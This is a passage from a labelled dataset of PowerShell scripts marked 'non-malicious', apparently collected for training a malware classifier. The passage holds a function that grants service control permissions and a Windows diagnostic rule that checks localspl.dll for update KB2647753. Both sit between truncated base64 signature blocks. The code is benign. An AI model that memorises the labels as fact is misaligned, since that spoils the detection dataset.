# VQQGEwJHQjEbMBkGA1UECBMSR3JlYXRlciBNYW5jaGVzdGVyMRAwDgYDVQQHEwdT
# YWxmb3JkMRgwFgYDVQQKEw9TZWN0aWdvIExpbWl0ZWQxJTAjBgNVBAMTHFNlY3Rp
# Z28gUlNBIFRpbWUgU3RhbXBpbmcgQ0ECEQCMd6AAj/TRsMY9nzpIg41rMA0GCWCG
# SAFlAwQCAgUAoIIBazAaBgkqhkiG9w0BCQMxDQYLKoZIhvcNAQkQAQQwHAYJKoZI
# hvcNAQkFMQ8XDTIxMTAyNzEyMTEwMFowPwYJKoZIhvcNAQkEMTIEMOEumTnUv7bB
# DYaV3j0+Nt2Qcuv+PQ++CUlUm7sMQumeTPTXOag/6Mylof+I14twdjCB7QYLKoZI
# hvcNAQkQAgwxgd0wgdowgdcwFgQUlRE3EB2ILzG9UT+UmtpMaK2MCPUwgbwEFALW
# W5Xig3DBVwCV+oj5I92Tf62PMIGjMIGOpIGLMIGIMQswCQYDVQQGEwJVUzETMBEG
# A1UECBMKTmV3IEplcnNleTEUMBIGA1UEBxMLSmVyc2V5IENpdHkxHjAcBgNVBAoT
# FVRoZSBVU0VSVFJVU1QgTmV0d29yazEuMCwGA1UEAxMlVVNFUlRydXN0IFJTQSBD
# ZXJ0aWZpY2F0aW9uIEF1dGhvcml0eQIQMA9vrN1mmHR8qUY2p3gtuTANBgkqhkiG
# 9w0BAQEFAASCAgBJmajClqOjvWVfyE0y6G5g6FRw7sU8Wsa3/RJj9Wh0nKtpu2uq
# OizzZZCVXj+C3i2vwQYorL6BFvPUqneOKABwkwAcJUkQKHMhIXnPY8fIItb8FdtY
# bgqWCyRUDsi7Bmlla76lpibikwdA6GYHb5LS5TrmeczV91TGjPbzDBsEM7X2J41U
# QoY3pB7WTyHRFdbrUFIypKU78aoeRJTXIO4zGe+cdKLb+01+KFrbmRwzWGkhy+/h
# 4C1OCe6o/3Be883ZBgq7wqpipHb4utv++GvfJN9kYQxPfX3Tvkcbk7KGhmHMSQal
# j2mkr9INlV6Onf/nSzWf7TI5xQ2axP7m9LFXc5RTdYQpSG74BEpP/5ljJGV3DKAY
# v+A7ExO6ioDCauEeJ7vLvHNltRBLKjw39OHX6SIhe9H0Vq4T/EYzRWFsRt73BzgB
# 43RjSCqxfMfUJJYx07xQi33m4qmL82b34i1vN1K74zxh7iaM7mNZ/Z+6n8tokKi6
# oa94iyAf+V5p6Gy2uu/lnz51DiBrf/Kovk+nq8zUlIx6GHKBIMPuAfbdZenOYn7i
# a/+IHi1pDtEqty243eb4Xdr7FoBdHCDcB6HZkvPZBoXjjuUSsqGBPwx/OiKJ7ZSu
# k3+jHx5fQLc6ohKdlDPtb1Cr5AOseIfmp2k/SKKPuyYuzif5DuzzkDeNcw==
# SIG # End signature block
|
combined_dataset/train/non-malicious/1455.ps1
|
1455.ps1
|
function Grant-CServiceControlPermission
{
[CmdletBinding(SupportsShouldProcess=$true)]
param(
[Parameter(Mandatory=$true)]
[string]
$ServiceName,
[Parameter(Mandatory=$true)]
[string]
$Identity
)
Set-StrictMode -Version 'Latest'
Use-CallerPreference -Cmdlet $PSCmdlet -Session $ExecutionContext.SessionState
if( $pscmdlet.ShouldProcess( $ServiceName, "grant control service permissions to '$Identity'" ) )
{
Grant-CServicePermission -Name $ServiceName -Identity $Identity -QueryStatus -EnumerateDependents -Start -Stop
}
}
|
combined_dataset/train/non-malicious/sample_4_13.ps1
|
sample_4_13.ps1
|
#************************************************
# TS_Win7PrintUpdateRollupCheck.ps1
# Version 1.0.1
# Date: 6/8/2012
# Author: v-alyao
# Description: [Idea ID 4168] [Windows] Check for existence of 2647753 for printing issues
# Rule number: 4168
# Rule URL: http://sharepoint/sites/rules/Rule Submissions/Forms/DispForm.aspx?ID=4168
#************************************************
Import-LocalizedData -BindingVariable ScriptStrings
Display-DefaultActivity -Rule -RuleNumber 4168
$RuleApplicable = $false
$RootCauseDetected = $false
$RootCauseName = "RC_Win7PrintUpdateRollupCheck"
$PublicContent = "http://support.microsoft.com/kb/2647753"
$InternalContent = ""
$Verbosity = "Warning"
$Visibility = "4"
$SupportTopicsID = "8066"
$Title = $ScriptStrings.ID_Win7PrintUpdateRollupCheck_ST
$InformationCollected = new-object PSObject
# ***************************
# Data Gathering
# ***************************
Function AppliesToSystem
{
#Add your logic here to specify on which environments this rule will appy
return(($OSVersion.Build -eq 7600) -or ($OSVersion.Build -eq 7601))#Win 7/Server 2008 R2
}
#Check the Localspl.dll is installed or not.
Function CheckHotfixInstalled()
{
$file="$Env:Windir\system32\localspl.dll"
if(Test-Path -Path $file)
{
$fileVersionInfo = [System.Diagnostics.FileVersionInfo]::GetVersionInfo($file)
if(($OSVersion.Build -eq 7600) -and ($fileVersionInfo.FilePrivatePart.ToString().StartsWith("16")))
{
$filePrivatePartVersion=16962
$requiredVersion='6.1.7600.16962'
}
elseif(($OSVersion.Build -eq 7600) -and ($fileVersionInfo.FilePrivatePart.ToString().StartsWith("21")))
{
$filePrivatePartVersion=21149
$requiredVersion='6.1.7600.21149'
}
elseif(($OSVersion.Build -eq 7601) -and ($fileVersionInfo.FilePrivatePart.ToString().StartsWith("17")))
{
$filePrivatePartVersion=17777
$requiredVersion='6.1.7601.17777'
}
elseif(($OSVersion.Build -eq 7601) -and ($fileVersionInfo.FilePrivatePart.ToString().StartsWith("21")))
{
$filePrivatePartVersion=21921
$requiredVersion='6.1.7601.21921'
}
if (-not(CheckMinimalFileVersion $file 6 1 $OSVersion.Build $filePrivatePartVersion))
{
add-member -inputobject $InformationCollected -membertype noteproperty -name "Localspl.dll current version" -value (Get-FileVersionString($file))
add-member -inputobject $InformationCollected -membertype noteproperty -name "Localspl.dll required version" -value $requiredVersion
return $false
}
}
return $true
}
# **************
# Detection Logic
# **************
#Check to see if rule is applicable to this computer
if (AppliesToSystem)
{
$RuleApplicable = $true
if (-not (CheckHotfixInstalled))
{
$RootCauseDetected = $true
}
}
# *********************
# Root Cause processing
# *********************
if ($RuleApplicable)
{
if ($RootCauseDetected)
{
# Red/ Yellow Light
Update-DiagRootCause -id $RootCauseName -Detected $true
Write-GenericMessage -RootCauseId $RootCauseName -PublicContentURL $PublicContent -InformationCollected $InformationCollected -Verbosity $Verbosity -Visibility $Visibility -SupportTopicsID $SupportTopicsID -InternalContentURL $InternalContent -SolutionTitle $Title
}
else
{
# Green Light
Update-DiagRootCause -id $RootCauseName -Detected $false
}
}
# SIG # Begin signature block
# MIIoVQYJKoZIhvcNAQcCoIIoRjCCKEICAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAFYwY2j/F0c8no
# QjvLG556Fhw8ebyprgyc4hX6lLzv96CCDYUwggYDMIID66ADAgECAhMzAAAEA73V
# lV0POxitAAAAAAQDMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTEzWhcNMjUwOTExMjAxMTEzWjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQCfdGddwIOnbRYUyg03O3iz19XXZPmuhEmW/5uyEN+8mgxl+HJGeLGBR8YButGV
# LVK38RxcVcPYyFGQXcKcxgih4w4y4zJi3GvawLYHlsNExQwz+v0jgY/aejBS2EJY
# oUhLVE+UzRihV8ooxoftsmKLb2xb7BoFS6UAo3Zz4afnOdqI7FGoi7g4vx/0MIdi
# kwTn5N56TdIv3mwfkZCFmrsKpN0zR8HD8WYsvH3xKkG7u/xdqmhPPqMmnI2jOFw/
# /n2aL8W7i1Pasja8PnRXH/QaVH0M1nanL+LI9TsMb/enWfXOW65Gne5cqMN9Uofv
# ENtdwwEmJ3bZrcI9u4LZAkujAgMBAAGjggGCMIIBfjAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU6m4qAkpz4641iK2irF8eWsSBcBkw
# VAYDVR0RBE0wS6RJMEcxLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9wZXJh
# dGlvbnMgTGltaXRlZDEWMBQGA1UEBRMNMjMwMDEyKzUwMjkyNjAfBgNVHSMEGDAW
# gBRIbmTlUAXTgqoXNzcitW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIw
# MTEtMDctMDguY3JsMGEGCCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDov
# L3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDEx
# XzIwMTEtMDctMDguY3J0MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIB
# AFFo/6E4LX51IqFuoKvUsi80QytGI5ASQ9zsPpBa0z78hutiJd6w154JkcIx/f7r
# EBK4NhD4DIFNfRiVdI7EacEs7OAS6QHF7Nt+eFRNOTtgHb9PExRy4EI/jnMwzQJV
# NokTxu2WgHr/fBsWs6G9AcIgvHjWNN3qRSrhsgEdqHc0bRDUf8UILAdEZOMBvKLC
# rmf+kJPEvPldgK7hFO/L9kmcVe67BnKejDKO73Sa56AJOhM7CkeATrJFxO9GLXos
# oKvrwBvynxAg18W+pagTAkJefzneuWSmniTurPCUE2JnvW7DalvONDOtG01sIVAB
# +ahO2wcUPa2Zm9AiDVBWTMz9XUoKMcvngi2oqbsDLhbK+pYrRUgRpNt0y1sxZsXO
# raGRF8lM2cWvtEkV5UL+TQM1ppv5unDHkW8JS+QnfPbB8dZVRyRmMQ4aY/tx5x5+
# sX6semJ//FbiclSMxSI+zINu1jYerdUwuCi+P6p7SmQmClhDM+6Q+btE2FtpsU0W
# +r6RdYFf/P+nK6j2otl9Nvr3tWLu+WXmz8MGM+18ynJ+lYbSmFWcAj7SYziAfT0s
# IwlQRFkyC71tsIZUhBHtxPliGUu362lIO0Lpe0DOrg8lspnEWOkHnCT5JEnWCbzu
# iVt8RX1IV07uIveNZuOBWLVCzWJjEGa+HhaEtavjy6i7MIIHejCCBWKgAwIBAgIK
# YQ6Q0gAAAAAAAzANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlm
# aWNhdGUgQXV0aG9yaXR5IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEw
# OTA5WjB+MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UE
# BxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYD
# VQQDEx9NaWNyb3NvZnQgQ29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG
# 9w0BAQEFAAOCAg8AMIICCgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+la
# UKq4BjgaBEm6f8MMHt03a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc
# 6Whe0t+bU7IKLMOv2akrrnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4D
# dato88tt8zpcoRb0RrrgOGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+
# lD3v++MrWhAfTVYoonpy4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nk
# kDstrjNYxbc+/jLTswM9sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6
# A4aN91/w0FK/jJSHvMAhdCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmd
# X4jiJV3TIUs+UsS1Vz8kA/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL
# 5zmhD+kjSbwYuER8ReTBw3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zd
# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGiYwghoiAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA
# BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIIkz
# la+bRK2BGqMSAJarDbkiTx3LO60LPcLffMObE/FWMEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEAluwbgbMCMG7Rjw77eA/w+EdZ7s+mgNayhVbY
# xGlHPH0DnznFx4J13sxWIFp7AZdGopVX636rHYmL7kMB1EN3vGlKCzNys5bT+CfJ
# yNe7H21lKi81do9D6tY21xak63ZxEGagLXvgmTq91JPy+Ttz0gcX+IOBPKK0GChh
# y7QgOYftnb2Jp46ydxweLpIOOuNXoakSemnR/oPr9ZDQ3DV2iIhjm8DgGDtxpV5D
# TBpd0PdlHt5g2UbU9FcwEd5VwIncH+V0FZ1LuZeh6EEzE0ngK9U3TidtTanrQv3j
# ujfrQbiNpPVfnlTxZ6o4ME+t4kpkm6icirkSOO1uq122h2Vwu6GCF7AwghesBgor
# BgEEAYI3AwMBMYIXnDCCF5gGCSqGSIb3DQEHAqCCF4kwgheFAgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFaBgsqhkiG9w0BCRABBKCCAUkEggFFMIIBQQIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCBrFikn94kx8awtvftzosQmpUWJduiPIyIA
# pc+gIA3XFAIGZutZ6YIxGBMyMDI0MTAyODExNDA0MS43MDdaMASAAgH0oIHZpIHW
# MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL
# EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT
# Hm5TaGllbGQgVFNTIEVTTjo1MjFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z
# b2Z0IFRpbWUtU3RhbXAgU2VydmljZaCCEf4wggcoMIIFEKADAgECAhMzAAACAAvX
# qn8bKhdWAAEAAAIAMA0GCSqGSIb3DQEBCwUAMHwxCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1w
# IFBDQSAyMDEwMB4XDTI0MDcyNTE4MzEyMVoXDTI1MTAyMjE4MzEyMVowgdMxCzAJ
# BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k
# MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jv
# c29mdCBJcmVsYW5kIE9wZXJhdGlvbnMgTGltaXRlZDEnMCUGA1UECxMeblNoaWVs
# ZCBUU1MgRVNOOjUyMUEtMDVFMC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGlt
# ZS1TdGFtcCBTZXJ2aWNlMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA
# r1XaadKkP2TkunoTF573/tF7KJM9Doiv3ccv26mqnUhmv2DM59ikET4WnRfo5biF
# IHc6LqrIeqCgT9fT/Gks5VKO90ZQW2avh/PMHnl0kZfX/I5zdVooXHbdUUkPiZfN
# XszWswmL9UlWo8mzyv9Lp9TAtw/oXOYTAxdYSqOB5Uzz1Q3A8uCpNlumQNDJGDY6
# cSn0MlYukXklArChq6l+KYrl6r/WnOqXSknABpggSsJ33oL3onmDiN9YUApZwjnN
# h9M6kDaneSz78/YtD/2pGpx9/LXELoazEUFxhyg4KdmoWGNYwdR7/id81geOER69
# l5dJv71S/mH+Lxb6L692n8uEmAVw6fVvE+c8wjgYZblZCNPAynCnDduRLdk1jswC
# qjqNc3X/WIzA7GGs4HUS4YIrAUx8H2A94vDNiA8AWa7Z/HSwTCyIgeVbldXYM2Bt
# xMKq3kneRoT27NQ7Y7n8ZTaAje7Blfju83spGP/QWYNZ1wYzYVGRyOpdA8Wmxq5V
# 8f5r4HaG9zPcykOyJpRZy+V3RGighFmsCJXAcMziO76HinwCIjImnCFKGJ/IbLjH
# 6J7fJXqRPbg+H6rYLZ8XBpmXBFH4PTakZVYxB/P+EQbL5LNw0ZIM+eufxCljV4O+
# nHkM+zgSx8+07BVZPBKslooebsmhIcBO0779kehciYMCAwEAAaOCAUkwggFFMB0G
# A1UdDgQWBBSAJSTavgkjKqge5xQOXn35fXd3OjAfBgNVHSMEGDAWgBSfpxVdAF5i
# XYP05dJlpxtTNRnpcjBfBgNVHR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jv
# c29mdC5jb20vcGtpb3BzL2NybC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENB
# JTIwMjAxMCgxKS5jcmwwbAYIKwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRw
# Oi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRp
# bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1Ud
# JQEB/wQMMAoGCCsGAQUFBwMIMA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsF
# AAOCAgEAKPCG9njRtIqQ+fuECgxzWMsQOI3HvW7sV9PmEWCCOWlTuGCIzNi3ibdL
# ZS0b2IDHg0yLrtdVuBi3FxVdesIXuzYyofIe/alTBdV4DhijLTXtB7NgOno7G12i
# O3t6jy1hPSquzGLry/2mEZBwIsSoS2D+H+3HCJxPDyhzMFqP+plltPACB/QNwZ7q
# +HGyZv3v8et+rQYg8sF3PTuWeDg3dR/zk1NawJ/dfFCDYlWNeCBCLvNPQBceMYXF
# RFKhcSUws7mFdIDDhZpxqyIKD2WDwFyNIGEezn+nd4kXRupeNEx+eSpJXylRD+1d
# 45hb6PzOIF7BkcPtRtFW2wXgkjLqtTWWlBkvzl2uNfYJ3CPZVaDyMDaaXgO+H6Di
# rsJ4IG9ikId941+mWDejkj5aYn9QN6ROfo/HNHg1timwpFoUivqAFu6irWZFw5V+
# yLr8FLc7nbMa2lFSixzu96zdnDsPImz0c6StbYyhKSlM3uDRi9UWydSKqnEbtJ6M
# k+YuxvzprkuWQJYWfpPvug+wTnioykVwc0yRVcsd4xMznnnRtZDGMSUEl9tMVneb
# YRshwZIyJTsBgLZmHM7q2TFK/X9944SkIqyY22AcuLe0GqoNfASCIcZtzbZ/zP4l
# T2/N0pDbn2ffAzjZkhI+Qrqr983mQZWwZdr3Tk1MYElDThz2D0MwggdxMIIFWaAD
# AgECAhMzAAAAFcXna54Cm0mZAAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYD
# VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEe
# MBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3Nv
# ZnQgUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIy
# MjVaFw0zMDA5MzAxODMyMjVaMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNo
# aW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29y
# cG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEw
# MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5
# vQ7VgtP97pwHB9KpbE51yMo1V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64
# NmeFRiMMtY0Tz3cywBAY6GB9alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhu
# je3XD9gmU3w5YQJ6xKr9cmmvHaus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl
# 3GoPz130/o5Tz9bshVZN7928jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPg
# yY9+tVSP3PoFVZhtaDuaRr3tpK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I
# 5JasAUq7vnGpF1tnYN74kpEeHT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2
# ci/bfV+AutuqfjbsNkz2K26oElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/
# TNuvXsLz1dhzPUNOwTM5TI4CvEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy
# 16cg8ML6EgrXY28MyTZki1ugpoMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y
# 1BzFa/ZcUlFdEtsluq9QBXpsxREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6H
# XtqPnhZyacaue7e3PmriLq0CAwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMB
# AAEwIwYJKwYBBAGCNxUCBBYEFCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQW
# BBSfpxVdAF5iXYP05dJlpxtTNRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30B
# ATBBMD8GCCsGAQUFBwIBFjNodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3Bz
# L0RvY3MvUmVwb3NpdG9yeS5odG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYB
# BAGCNxQCBAweCgBTAHUAYgBDAEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMB
# Af8wHwYDVR0jBBgwFoAU1fZWy4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBL
# oEmgR4ZFaHR0cDovL2NybC5taWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMv
# TWljUm9vQ2VyQXV0XzIwMTAtMDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggr
# BgEFBQcwAoY+aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNS
# b29DZXJBdXRfMjAxMC0wNi0yMy5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1Vffwq
# reEsH2cBMSRb4Z5yS/ypb+pcFLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27
# DzHkwo/7bNGhlBgi7ulmZzpTTd2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pv
# vinLbtg/SHUB2RjebYIM9W0jVOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9Ak
# vUCgvxm2EhIRXT0n4ECWOKz3+SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWK
# NsIdw2FzLixre24/LAl4FOmRsqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2
# kQH2zsZ0/fZMcm8Qq3UwxTSwethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+
# c23Kjgm9swFXSVRk2XPXfx5bRAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep
# 8beuyOiJXk+d0tBMdrVXVAmxaQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+Dvk
# txW/tM4+pTFRhLy/AsGConsXHRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1Zyvg
# DbjmjJnW4SLq8CdCPSWU5nR0W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/
# 2XBjU02N7oJtpQUQwXEGahC0HVUzWLOhcGbyoYIDWTCCAkECAQEwggEBoYHZpIHW
# MIHTMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQL
# EyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJzAlBgNVBAsT
# Hm5TaGllbGQgVFNTIEVTTjo1MjFBLTA1RTAtRDk0NzElMCMGA1UEAxMcTWljcm9z
# b2Z0IFRpbWUtU3RhbXAgU2VydmljZaIjCgEBMAcGBSsOAwIaAxUAjJOfLZb3ivip
# L3sSLlWFbLrWjmSggYMwgYCkfjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx
# MDANBgkqhkiG9w0BAQsFAAIFAOrJ6QUwIhgPMjAyNDEwMjgxMDQyMTNaGA8yMDI0
